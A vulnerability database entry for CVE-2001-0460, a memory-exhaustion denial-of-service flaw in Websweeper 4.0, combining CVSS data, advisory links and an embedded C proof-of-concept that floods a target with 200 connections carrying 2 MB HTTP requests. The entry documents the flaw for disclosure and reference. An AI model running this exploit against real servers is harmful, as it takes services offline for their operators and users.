CVE-2001-0460
CVSS 5.0
Published: 2001-06-27 00:00:00
Last revised: 2008-09-05 16:24:10

[Original] Websweeper 4.0 does not limit the length of certain HTTP headers, which allows remote attackers to cause a denial of service (memory exhaustion) via an extremely large HTTP Referrer: header.


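[CNNVD] Websweeper vulnerability (CNNVD-200106-158)

        Websweeper 4.0 does not limit the length of certain HTTP headers. A remote attacker can cause a denial of service (memory consumption) by means of an extremely large HTTP Referrer: header.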

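- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]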

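- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links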

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0460
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0460
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-158
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/167406
(VENDOR_ADVISORY)  BUGTRAQ  20010308 def-2001-10: Websweeper Infinite HTTP Request DoS
http://xforce.iss.net/static/6214.php
(VENDOR_ADVISORY)  XF  websweeper-http-dos

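- Vulnerability information

Websweeper vulnerability
Medium severity  Unknown
2001-06-27 00:00:00 2005-10-20 00:00:00
Remote
        Websweeper 4.0 does not limit the length of certain HTTP headers. A remote attacker can cause a denial of service (memory consumption) by means of an extremely large HTTP Referrer: header.

- Advisories and patches

- Vulnerability information (20681)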

Baltimore Technologies WEBsweeper 4.0 DoS Vulnerability (EDBID:20681)
windows dos
2001-01-22 Verified
0 honoriak
N/A
source: http://www.securityfocus.com/bid/2465/info

Baltimore Technology WEBsweeper is subject to a denial of service condition. Submitting an unusually long HTTP request through WEBsweeper will cause the consumption of all available memory on the server where WEBsweeper resides. 

/*

----[ honoriak from [HeliSec] 22.3.2001

   	[ Proof of concept Websweeper Infinite HTTP Request DoS  ]
   	[ Advisory Defcom Labs Advisory def-2001-10	         ]

	Thanks to doing and all helisec members: merphe, jet-li, kiss,
	lyw0d, bonjy.

*/


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <time.h>
#include <sys/time.h>
#include <fcntl.h>

#define PORT 80
#define LEN 2000000
#define CON 200

int i, v, n, sel, envi;
int cons[CON];
char ah[LEN];
char ahh[LEN + 7];
char *host;
fd_set env;
struct sockaddr_in victim;

void usage(char *prog) {
	printf("[ Websweeper Infinite HTTP Request DoS by honoriak@mail.ru ");
	printf("from Helisec ]\n");
	printf("-- Advisory: Defcom Labs Advisory def-2001-10 --\n\n");
	printf("Usage: %s hostname number_of_gets\n", prog);
	exit(0);
	}

unsigned long resolver(char *h)  {

struct in_addr h2;
struct hostent *hvic;

if (!(hvic = gethostbyname(h))) return(0);
memcpy((char *)&h2.s_addr, hvic->h_addr, hvic->h_length);
return(h2.s_addr);
}

int main(int argc, char *argv[])
{

	if (argc < 2)
        {
        	usage(argv[0]);
        }

bzero(&victim, sizeof(victim));
victim.sin_family = AF_INET;
victim.sin_port = htons(PORT);

if ( (inet_pton(AF_INET, argv[1], &victim.sin_addr)) <= 0)
	{
	victim.sin_addr.s_addr = resolver(argv[1]);
	}

if (!victim.sin_addr.s_addr) {
	printf("Error resolving host\n");
	exit(-1);
	}

for (i=0; i<=(LEN-1); i++)  ah[i] = 'a';
ah[LEN-1] = '\0';
printf("Sending Infinite HTTP Request...\n");

sprintf(ahh, "GET /%s\n", ah);

for (sel=0; sel < CON; sel++)
{

if ((cons[sel] = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
	printf("Error opening socket\n");
        exit(-1);
        }

if ( (n=connect(cons[sel], (struct sockaddr *)&victim, sizeof(victim))) < 0) {
                  printf("Error connecting\n");
                  exit(-1);
         }

}

for (sel=0; sel < CON; sel++) {

FD_SET(cons[sel], &env);

envi=select(cons[sel] + 1, NULL, &env, NULL, NULL);

if ( FD_ISSET(cons[sel], &env) ) {
if ( (send(cons[sel], ahh, strlen(ahh), 0)) < 1) {
	printf("Error sending\n");
	exit(-1);
	}
}

}
exit(-1);
}

/* [HeliSec] <=> [Helios Security and Administration] */

		

- Vulnerability information

13882
WEBsweeper Large HTTP Referrer: Header Handling Remote Memory Exhaustion DoS
Local / Remote, Context Dependent Denial of Service
Loss of Availability
Exploit Public Vendor Verified

- Vulnerability description

Websweeper contains a flaw that may allow a remote denial of service. The issue is triggered when sending excessively long HTTP headers, and will result in loss of availability for the platform by consuming available memory resources.

- Timeline

2001-03-08 Unknown
2001-03-08 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. The vendor suggests using a firewall.

- Related references

- Vulnerability author
